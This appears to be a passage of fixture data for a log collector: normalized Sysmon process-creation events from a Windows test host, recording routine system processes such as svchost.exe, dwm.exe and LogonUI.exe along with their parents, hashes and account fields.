+{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:25.4188169Z\"},\"EventRecordID\":\"27457\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.855\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010eac90000}\"},{\"Name\":\"ProcessId\",\"text\":\"636\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalServiceNoNetwork -p\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork -p", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-0010eac90000", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "636", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.855Z", "type": "raw", "uuid": "b1b49508-e8f6-47b7-b265-1f083081ebb4"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:25.2257296Z\"},\"EventRecordID\":\"27445\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.801\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00105fc20000}\"},{\"Name\":\"ProcessId\",\"text\":\"1020\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s gpsvc\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-00105fc20000", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1020", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.801Z", "type": "raw", "uuid": "a6977992-11cd-45e7-8c95-b809900d5c92"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:25.2115064Z\"},\"EventRecordID\":\"27442\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.785\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-001035c00000}\"},{\"Name\":\"ProcessId\",\"text\":\"1000\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\dwm.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.831 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Desktop Window Manager\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"dwm.exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"dwm.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"Window Manager\\\\DWM-1\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020f6bf0000}\"},{\"Name\":\"LogonId\",\"text\":\"0xbff6\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=2371C02842FD9670FA47B2EAE4CB08FA7A6070C1,MD5=5CE3CCA35D8B19967B25806B7FF69D0F,SHA256=5954A267C8F271798EC0AC18D5F67F21A70B47258B10601511CA2109FFFDCF71,IMPHASH=CC05EDB80F10F1D5E7EC964B8C83F969\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-001096530000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"568\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\winlogon.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"winlogon.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020f6bf0000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "window manager", "object.account.id": "synthetic:dwm-1@window manager", "object.account.name": "dwm-1", "object.account.privileges": "System", "object.account.session_id": "49142", "object.process.cmdline": "\"dwm.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\dwm.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-001035c00000", "object.process.hash.imphash": "CC05EDB80F10F1D5E7EC964B8C83F969", "object.process.hash.md5": "5CE3CCA35D8B19967B25806B7FF69D0F", "object.process.hash.sha1": "2371C02842FD9670FA47B2EAE4CB08FA7A6070C1", "object.process.hash.sha256": "5954A267C8F271798EC0AC18D5F67F21A70B47258B10601511CA2109FFFDCF71", "object.process.id": "1000", "object.process.meta": "Description:Desktop Window Manager | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "dwm.exe", "object.process.original_name": "dwm.exe", "object.process.parent.cmdline": "winlogon.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\winlogon.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-001096530000", "object.process.parent.id": "568", "object.process.parent.name": "winlogon.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.831 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "window manager", "subject.account.id": "synthetic:dwm-1@window manager", "subject.account.name": "dwm-1", "subject.account.privileges": "System", "subject.account.session_id": "49142", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.785Z", "type": "raw", "uuid": "24bfdf27-1a6b-47c6-a0c3-51ffeb942c07"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:25.1987705Z\"},\"EventRecordID\":\"27438\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.783\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010debf0000}\"},{\"Name\":\"ProcessId\",\"text\":\"992\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\LogonUI.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Logon User Interface Host\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"logonui.exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"LogonUI.exe\\\" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=E1AB36E5C3C1453C592E2901330EB13C5D29B351,MD5=33F89DD9629CB0422A2C17268376232D,SHA256=9358EF8CB7FB08581D74274005263BD8FA2E6E0FC443930B25FD345CF6CE9071,IMPHASH=B9B0B64B08B38276711093CA94348D39\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-001096530000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"568\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\winlogon.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"winlogon.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\"LogonUI.exe\" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\logonui.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-0010debf0000", "object.process.hash.imphash": "B9B0B64B08B38276711093CA94348D39", "object.process.hash.md5": "33F89DD9629CB0422A2C17268376232D", "object.process.hash.sha1": "E1AB36E5C3C1453C592E2901330EB13C5D29B351", "object.process.hash.sha256": "9358EF8CB7FB08581D74274005263BD8FA2E6E0FC443930B25FD345CF6CE9071", "object.process.id": "992", "object.process.meta": "Description:Windows Logon User Interface Host | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "logonui.exe", "object.process.original_name": "logonui.exe", "object.process.parent.cmdline": "winlogon.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\winlogon.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-001096530000", "object.process.parent.id": "568", "object.process.parent.name": "winlogon.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.783Z", "type": "raw", "uuid": "235d64a0-e65a-45ee-8fad-e5575575c6bc"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:24.1944137Z\"},\"EventRecordID\":\"27420\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.578\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010fe6f0000}\"},{\"Name\":\"ProcessId\",\"text\":\"808\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k DcomLaunch -p\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-0010fe6f0000", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "808", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.578Z", "type": "raw", "uuid": "0c0563cc-4571-4247-b636-3900009868a0"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:24.1883985Z\"},\"EventRecordID\":\"27417\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.555\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00105b6c0000}\"},{\"Name\":\"ProcessId\",\"text\":\"732\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k DcomLaunch -p -s PlugPlay\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": 